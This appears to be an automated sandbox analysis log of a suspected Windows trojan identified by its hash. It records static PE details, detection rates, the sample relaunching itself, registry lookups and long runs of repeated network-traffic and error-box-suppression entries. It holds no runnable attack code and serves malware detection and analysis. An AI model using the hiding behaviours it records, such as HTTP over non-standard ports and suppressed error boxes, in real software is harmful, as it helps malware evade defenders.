                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSwells.exe4 vs 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000001.00000002.220976731.00000000005CE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMethodAttributes.exe\ vs 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.466285029.00000000008DE000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMethodAttributes.exe\ vs 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468118490.000000000107A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.465827946.000000000041A000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameSwells.exe4 vs 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeBinary or memory string: OriginalFilenameMethodAttributes.exe\ vs 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal68.troj.winEXE@3/1@0/1
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe.logJump to behavior
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeVirustotal: Detection: 38%
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeReversingLabs: Detection: 67%
                Source: unknownProcess created: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe 'C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe'
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess created: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess created: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: System.ServiceModel.pdbl6 source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468518828.000000000112E000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdbj source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.468229225.00000000010A2000.00000004.00000020.sdmp
                Source: Binary string: jHC:\Windows\System.ServiceModel.pdb source: 7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe, 00000002.00000002.466476163.0000000000CF8000.00000004.00000001.sdmp
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 1_2_0279F990 pushfd ; iretd
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_050FA1F7 push E801005Eh; retf
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeCode function: 2_2_050F98A0 push 38050ACBh; retf
                Source: initial sampleStatic PE information: section name: .text entropy: 7.50941268753

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Uses known network protocols on non-standard portsShow sources
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 11556
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: unknownNetwork traffic detected: HTTP traffic on port 11556 -> 49725
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exeProcess information set: NOOPENFILEERRORBOX
